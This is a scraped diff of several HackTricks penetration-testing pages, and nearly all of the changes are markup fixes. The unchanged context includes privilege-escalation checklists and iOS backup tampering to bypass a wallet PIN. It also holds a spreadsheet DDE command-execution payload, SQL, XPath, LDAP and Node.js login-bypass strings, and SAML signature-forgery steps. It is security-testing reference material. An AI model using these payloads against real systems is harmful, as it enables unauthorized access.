* [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)**** * [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)\*\*\*\*
* [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder? * [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder?
* [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)? * [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)?
* [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)? * [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)?
@ -121,7 +121,7 @@ If you want to **share some tricks with the community** you can also submit **pu
### [SSH](privilege-escalation/#ssh) ### [SSH](privilege-escalation/#ssh)
* [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166) * [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
* [ ] ****[**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)**** * [ ] [**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)
### [Interesting Files](privilege-escalation/#interesting-files) ### [Interesting Files](privilege-escalation/#interesting-files)
@ -138,14 +138,14 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne** * [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne**
* [ ] **Generic search** * [ ] **Generic search**
### ****[**Writable Files**](privilege-escalation/#writable-files)**** ### [**Writable Files**](privilege-escalation/#writable-files)
* [ ] **Modify python library** to execute arbitrary commands? * [ ] **Modify python library** to execute arbitrary commands?
* [ ] Can you **modify log files**? **Logtotten** exploit * [ ] Can you **modify log files**? **Logtotten** exploit
* [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit * [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit
* [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)? * [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)?
### ****[**Other tricks**](privilege-escalation/#other-tricks)**** ### [**Other tricks**](privilege-escalation/#other-tricks)
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? * [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)? * [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
@ -154,6 +154,6 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (3).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

View file

@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)** * Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA** * **Certificate chain** includes expired **Apple iPhone Device CA**
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1).png>)
### Step 6: Profile Installation ### Step 6: Profile Installation

View file

@ -62,12 +62,10 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code) * [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code)
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ \*\*\*\*If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (5).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)**** [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

View file

@ -88,7 +88,7 @@ There are multiple ways to define the UI in an iOS application: _storyboard_, _n
#### Info.plist #### Info.plist
The information property list or `Info.plist` is the main source of information for an iOS app. It consists of a structured file containing **key-value** pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are **expected to have** an `Info.plist` file. You can find all possible keys in the [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc). The information property list or `Info.plist` is the main source of information for an iOS app. It consists of a structured file containing **key-value** pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are **expected to have** an `Info.plist` file. You can find all possible keys in the [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information\_property\_list?language=objc).
The file might be formatted in **XML or binary (bplist)**. You can **convert it to XML** format with one simple command: The file might be formatted in **XML or binary (bplist)**. You can **convert it to XML** format with one simple command:
@ -167,7 +167,7 @@ These folders contain information that must be examined closely during applicati
* The app can disable paths by setting `NSURLIsExcludedFromBackupKey`. * The app can disable paths by setting `NSURLIsExcludedFromBackupKey`.
* **Library/Preferences/** * **Library/Preferences/**
* Used for storing properties that can **persist even after an application is restarted**. * Used for storing properties that can **persist even after an application is restarted**.
* Information is saved, unencrypted, inside the application sandbox in a plist file called \[BUNDLE_ID].plist. * Information is saved, unencrypted, inside the application sandbox in a plist file called \[BUNDLE\_ID].plist.
* All the key/value pairs stored using `NSUserDefaults` can be found in this file. * All the key/value pairs stored using `NSUserDefaults` can be found in this file.
* **tmp/** * **tmp/**
* Use this directory to write **temporary files** that do not need to persist between app launches. * Use this directory to write **temporary files** that do not need to persist between app launches.
@ -280,7 +280,7 @@ struct CGSize {
}; };
``` ```
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/). However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
## Data Storage ## Data Storage
@ -334,7 +334,7 @@ The file might be formatted in **XML or binary (bplist)**. You can **convert it
### Core Data ### Core Data
[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) is a framework for managing the model layer of objects in your application. [Core Data can use SQLite as its persistent store](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), but the framework itself is not a database.\ [`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple\_ref/doc/uid/TP40001075-CH8-SW1) is a framework for managing the model layer of objects in your application. [Core Data can use SQLite as its persistent store](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), but the framework itself is not a database.\
CoreData does not encrypt it's data by default. However, an additional encryption layer can be added to CoreData. See the [GitHub Repo](https://github.com/project-imas/encrypted-core-data) for more details. CoreData does not encrypt it's data by default. However, an additional encryption layer can be added to CoreData. See the [GitHub Repo](https://github.com/project-imas/encrypted-core-data) for more details.
You can find the SQLite Core Data information of an application in the path `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` You can find the SQLite Core Data information of an application in the path `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support`
@ -608,7 +608,7 @@ Many apps log informative (and potentially sensitive) messages to the console lo
5. Reproduce the problem. 5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (3).png>) ![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (2).png>)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
@ -633,11 +633,11 @@ iOS includes auto-backup features that create copies of the data stored on the d
Since iOS backs up installed apps and their data, an obvious concern is whether **sensitive user data** stored by the app might **unintentionally leak through the backup**. Another concern, though less obvious, is whether **sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behaviour after restoring a modified backup**. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today. Since iOS backs up installed apps and their data, an obvious concern is whether **sensitive user data** stored by the app might **unintentionally leak through the backup**. Another concern, though less obvious, is whether **sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behaviour after restoring a modified backup**. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today.
A backup of a device on which a mobile application has been installed will include all subdirectories (except for `Library/Caches/`) and files in the [app's private directory](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple_ref/doc/uid/TP40010672-CH2-SW12).\ A backup of a device on which a mobile application has been installed will include all subdirectories (except for `Library/Caches/`) and files in the [app's private directory](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple\_ref/doc/uid/TP40010672-CH2-SW12).\
Therefore, **avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories**. Therefore, **avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories**.
Although all the files in `Documents/` and `Library/Application Support/` are always backed up by default, you can [exclude files from the backup](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple_ref/doc/uid/TP40010672-CH2-SW28) by calling `NSURL setResourceValue:forKey:error:` with the `NSURLIsExcludedFromBackupKey` key.\ Although all the files in `Documents/` and `Library/Application Support/` are always backed up by default, you can [exclude files from the backup](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple\_ref/doc/uid/TP40010672-CH2-SW28) by calling `NSURL setResourceValue:forKey:error:` with the `NSURLIsExcludedFromBackupKey` key.\
You can use the [NSURLIsExcludedFromBackupKey](https://developer.apple.com/reference/foundation/nsurl#//apple_ref/c/data/NSURLIsExcludedFromBackupKey) and [CFURLIsExcludedFromBackupKey](https://developer.apple.com/reference/corefoundation/cfurl-rd7#//apple_ref/c/data/kCFURLIsExcludedFromBackupKey) file system properties to exclude files and directories from backups. You can use the [NSURLIsExcludedFromBackupKey](https://developer.apple.com/reference/foundation/nsurl#//apple\_ref/c/data/NSURLIsExcludedFromBackupKey) and [CFURLIsExcludedFromBackupKey](https://developer.apple.com/reference/corefoundation/cfurl-rd7#//apple\_ref/c/data/kCFURLIsExcludedFromBackupKey) file system properties to exclude files and directories from backups.
{% hint style="warning" %} {% hint style="warning" %}
Therefore when checking the backup of an application you should check if **any sensitive information** is accessible and if you can **modify any sensitive behaviour** of the application by **modifying some setting of the backup** and restoring the backup Therefore when checking the backup of an application you should check if **any sensitive information** is accessible and if you can **modify any sensitive behaviour** of the application by **modifying some setting of the backup** and restoring the backup
@ -664,14 +664,14 @@ To identify if a backup is encrypted, you can check the key named "IsEncrypted"
</plist> </plist>
``` ```
In case you need to work with an encrypted backup, there are some Python scripts in [DinoSec's GitHub repo](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), such as **backup_tool.py** and **backup_passwd.py**, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked. In case you need to work with an encrypted backup, there are some Python scripts in [DinoSec's GitHub repo](https://github.com/dinosec/iphone-dataprotection/tree/master/python\_scripts), such as **backup\_tool.py** and **backup\_passwd.py**, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked.
You can also use the tool [**iOSbackup**](https://pypi.org/project/iOSbackup/) to easily read and extract files from a password-encrypted iOS backup. You can also use the tool [**iOSbackup**](https://pypi.org/project/iOSbackup/) to easily read and extract files from a password-encrypted iOS backup.
#### How to modify the behaviour #### How to modify the behaviour
In the open source bitcoin wallet app, [Bither](https://github.com/bither/bither-ios), you'll see that it's possible to configure a PIN to lock the UI.\ In the open source bitcoin wallet app, [Bither](https://github.com/bither/bither-ios), you'll see that it's possible to configure a PIN to lock the UI.\
This is PIN is stored in the file `net.bither.plist` inside the **pin_code** **key**.\ This is PIN is stored in the file `net.bither.plist` inside the **pin\_code** **key**.\
If you clear this key from that plist in the backup and restores the backup, you will be able to access the wallet. If you clear this key from that plist in the backup and restores the backup, you will be able to access the wallet.
## Testing Memory for Sensitive Data ## Testing Memory for Sensitive Data
@ -753,7 +753,7 @@ The **fingerprint ID** sensor is operated by the [SecureEnclave security coproce
Developers have two options for incorporating Touch ID/Face ID authentication: Developers have two options for incorporating Touch ID/Face ID authentication:
* `LocalAuthentication.framework` is a high-level API that can be used to **authenticate the user via Touch ID**. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful. * `LocalAuthentication.framework` is a high-level API that can be used to **authenticate the user via Touch ID**. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful.
* `Security.framework` is a lower level API to access [keychain services](https://developer.apple.com/documentation/security/keychain_services). This is a secure option if your app needs to **protect some secret data with biometric authentication**, since the access control is managed on a system-level and can not easily be bypassed. `Security.framework` has a C API, but there are several [open source wrappers available](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id), making access to the keychain as simple as to NSUserDefaults. * `Security.framework` is a lower level API to access [keychain services](https://developer.apple.com/documentation/security/keychain\_services). This is a secure option if your app needs to **protect some secret data with biometric authentication**, since the access control is managed on a system-level and can not easily be bypassed. `Security.framework` has a C API, but there are several [open source wrappers available](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id), making access to the keychain as simple as to NSUserDefaults.
{% hint style="danger" %} {% hint style="danger" %}
Please be aware that using either the `LocalAuthentication.framework` or the `Security.framework`, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM) for more details. Please be aware that using either the `LocalAuthentication.framework` or the `Security.framework`, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM) for more details.
@ -774,7 +774,7 @@ The **iOS keychain APIs can (and should) be used to implement local authenticati
The keychain allows saving items with the special `SecAccessControl` attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters). The keychain allows saving items with the special `SecAccessControl` attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters).
In the following example we will save the string "test_strong_password" to the keychain. The string can be accessed only on the current device while the passcode is set (`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly` parameter) and after Touch ID authentication for the currently enrolled fingers only (`SecAccessControlCreateFlags.biometryCurrentSet` parameter): In the following example we will save the string "test\_strong\_password" to the keychain. The string can be accessed only on the current device while the passcode is set (`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly` parameter) and after Touch ID authentication for the currently enrolled fingers only (`SecAccessControlCreateFlags.biometryCurrentSet` parameter):
{% tabs %} {% tabs %}
{% tab title="Swift" %} {% tab title="Swift" %}
@ -990,7 +990,7 @@ In order to check this issue using Burp, after trusting Burp CA in the iPhone, y
### Certificate Pinning ### Certificate Pinning
If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\ If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\
In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) **\*\*or install \[**Burp Mobile Assistant_\*]\(_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\*\*\* In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) \*\*\*\*or install \[\*\*Burp Mobile Assistant\_\*]\(\_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\*\*\*
You can also use **objection's** `ios sslpinning disable` You can also use **objection's** `ios sslpinning disable`

View file

@ -68,7 +68,7 @@ If at this point you haven't found any interesting vulnerability you **may need
Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/). Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/).
Specially in Windows you could need some help to **avoid antiviruses**: **\*\*\[**Check this page**]\(windows/av-bypass.md)**.\*\* Specially in Windows you could need some help to **avoid antiviruses**: **\*\*\[Check this page]\(windows/av-bypass.md)**.\*\*
## 8- Inside ## 8- Inside
@ -140,6 +140,6 @@ Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to
* [**CBC-MAC**](cryptography/cipher-block-chaining-cbc-mac-priv.md) * [**CBC-MAC**](cryptography/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](cryptography/padding-oracle-priv.md) * [**Padding Oracle**](cryptography/padding-oracle-priv.md)
![](<.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1).png>) ![](<.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

View file

@ -4,7 +4,7 @@
First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example: First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example:
![](<../../../.gitbook/assets/image (389).png>) ![](<../../../.gitbook/assets/image (389) (1).png>)
In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties. In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties.

View file

@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1).png>)
### More ### More

View file

@ -7,7 +7,10 @@ If you find a login page, here you can find some techniques to try to bypass it:
* Check for **comments** inside the page (scroll down and to the right?) * Check for **comments** inside the page (scroll down and to the right?)
* Check if you can **directly access the restricted pages** * Check if you can **directly access the restricted pages**
* Check to **not send the parameters** (do not send any or only 1) * Check to **not send the parameters** (do not send any or only 1)
* Check the **PHP comparisons error:** _user\[]=a\&pwd=b_ , _user=a\&pwd\[]=b_ , _user\[]=a\&pwd\[]=b_ * Check the **PHP comparisons error:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
* Check nodejs potential parsing error (read [**this**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
* Nodejs will transform that payload to a query similar to the following one: `SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `**`password=password=1`**`;` which makes the password bit to be always true.
* Adding `"stringifyObjects":true` option when calling `mysql.createConnection` will eventually block all unexpected behaviours when `Object` is passed in the parameter.
* Check credentials: * Check credentials:
* [**Default credentials**](../../brute-force.md#default-credentials) of the technology/platform used * [**Default credentials**](../../brute-force.md#default-credentials) of the technology/platform used
* **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords). * **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords).
@ -26,13 +29,13 @@ In the following page you can find a **custom list to try to bypass login** via
### No SQL Injection authentication bypass ### No SQL Injection authentication bypass
[Here you can find several tricks to bypass the login via **No SQL Injections.**](../nosql-injection.md#basic-authentication-bypass)**** [Here you can find several tricks to bypass the login via **No SQL Injections**](../nosql-injection.md#basic-authentication-bypass)**.**
As the NoSQL Injections requires to change the parameters value, you will need to test them manually. As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
### XPath Injection authentication bypass ### XPath Injection authentication bypass
[Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)**** [Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)
``` ```
' or '1'='1 ' or '1'='1
@ -52,7 +55,7 @@ admin' or '1'='2
### LDAP Injection authentication bypass ### LDAP Injection authentication bypass
[Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)**** [Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)
``` ```
* *

View file

@ -8,7 +8,7 @@
## Attacks Graphic ## Attacks Graphic
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (4).png>) ![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (3).png>)
## Tool ## Tool
@ -193,13 +193,13 @@ Here you can find a **POC** to check for this kind of vulnerabilities, in the ha
You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to generate the POC from a SAML request to test for possible XSLT vulnerabilities. You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to generate the POC from a SAML request to test for possible XSLT vulnerabilities.
## XML Signature Exclusion <a href="xml-signature-exclusion" id="xml-signature-exclusion"></a> ## XML Signature Exclusion <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
Signature Exclusion is used to test how the SAML implementation behaves when there is **no Signature elemen**t. When a Signature element is **absent** the **signature validation step may get skipped entirely**. If the Signature isnt validated, then any of the contents that would typically be signed may be tampered with by an attacker. Signature Exclusion is used to test how the SAML implementation behaves when there is **no Signature elemen**t. When a Signature element is **absent** the **signature validation step may get skipped entirely**. If the Signature isnt validated, then any of the contents that would typically be signed may be tampered with by an attacker.
![](<../../.gitbook/assets/image (547).png>) ![](<../../.gitbook/assets/image (547).png>)
### Tool <a href="xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a> ### Tool <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
Signature exclusion begins with intercepting the SAML Response then clicking `Remove Signatures`. In doing so **all** Signature elements are removed. Signature exclusion begins with intercepting the SAML Response then clicking `Remove Signatures`. In doing so **all** Signature elements are removed.
@ -207,11 +207,11 @@ Signature exclusion begins with intercepting the SAML Response then clicking `Re
With the signatures removed, allow the request to proceed to the target. If the Signature isnt required by the Service With the signatures removed, allow the request to proceed to the target. If the Signature isnt required by the Service
## Certificate Faking <a href="certificate-faking" id="certificate-faking"></a> ## Certificate Faking <a href="#certificate-faking" id="certificate-faking"></a>
Certificate faking is the process of testing whether or not the Service Provider **verifies that a trusted Identity Provider signed the SAML Message.** The trust relationship between SP and IdP is established and **should be verified** each time a SAML Message is received. What this comes down to is using a **self-signed** certificate to sign the SAML Response or Assertion. Certificate faking is the process of testing whether or not the Service Provider **verifies that a trusted Identity Provider signed the SAML Message.** The trust relationship between SP and IdP is established and **should be verified** each time a SAML Message is received. What this comes down to is using a **self-signed** certificate to sign the SAML Response or Assertion.
### Tool <a href="certificate-faking-how-to" id="certificate-faking-how-to"></a> ### Tool <a href="#certificate-faking-how-to" id="certificate-faking-how-to"></a>
The Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) is going to be used.\ The Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) is going to be used.\
To fake a certificate, begin by intercepting the SAML Response.\ To fake a certificate, begin by intercepting the SAML Response.\
@ -229,7 +229,7 @@ Doing so generates a self-signed clone of the original certificate. Now its t
After signing the message with the self-signed cert, send it on its way. If we authenticate, we know that we can sign our SAML Messages. The ability to sign our SAML Messages means we can change values in the Assertion and they will be accepted by the Service Provider. After signing the message with the self-signed cert, send it on its way. If we authenticate, we know that we can sign our SAML Messages. The ability to sign our SAML Messages means we can change values in the Assertion and they will be accepted by the Service Provider.
## Token Recipient Confusion / Service Provider Target Confusion <a href="token-recipient-confusion" id="token-recipient-confusion"></a> ## Token Recipient Confusion / Service Provider Target Confusion <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
Token Recipient Confusion / Service Provider Target CONfusion **tests whether or not the Service Provider validates the Recipient**. This means, that **if the response was meant to a different Service Provide**r, the **current** Service Provider should notice it and **reject the authentication**.\ Token Recipient Confusion / Service Provider Target CONfusion **tests whether or not the Service Provider validates the Recipient**. This means, that **if the response was meant to a different Service Provide**r, the **current** Service Provider should notice it and **reject the authentication**.\
The **Recipient** field is an attribute of the **SubjectConfirmationData** element, which is a child of the Subject element in a SAML Response. The **Recipient** field is an attribute of the **SubjectConfirmationData** element, which is a child of the Subject element in a SAML Response.
@ -238,7 +238,7 @@ The **Recipient** field is an attribute of the **SubjectConfirmationData** eleme
The Recipient attribute found on the **SubjectConfirmationData element is a URL that specifies the location to which the Assertion must be delivered**. If the Recipient is a different Service Provider than the one who receives it, the Assertion should not be accepted. The Recipient attribute found on the **SubjectConfirmationData element is a URL that specifies the location to which the Assertion must be delivered**. If the Recipient is a different Service Provider than the one who receives it, the Assertion should not be accepted.
### How-to <a href="token-recipient-confusion-how-to" id="token-recipient-confusion-how-to"></a> ### How-to <a href="#token-recipient-confusion-how-to" id="token-recipient-confusion-how-to"></a>
SAML Token Recipient Confusion (SAML-TRC) has a few prequisite conditions in order for us to attempt exploitation. First, we **need** to have a **legitimate account on a Service Provider**. Second, **SP-Target must accept tokens issued by the same Identity Provider that services SP-Legit**. SAML Token Recipient Confusion (SAML-TRC) has a few prequisite conditions in order for us to attempt exploitation. First, we **need** to have a **legitimate account on a Service Provider**. Second, **SP-Target must accept tokens issued by the same Identity Provider that services SP-Legit**.

View file

@ -242,7 +242,7 @@ Some really bad implementations allowed the Null PIN to connect (very weird also
All the proposed WPS attacks can be easily performed using _**airgeddon.**_ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
![](<../../../.gitbook/assets/image (201).png>) ![](<../../../.gitbook/assets/image (201) (1).png>)
* 5 and 6 lets you try **your custom PIN** (if you have any) * 5 and 6 lets you try **your custom PIN** (if you have any)
* 7 and 8 perform the **Pixie Dust attack** * 7 and 8 perform the **Pixie Dust attack**

View file

@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
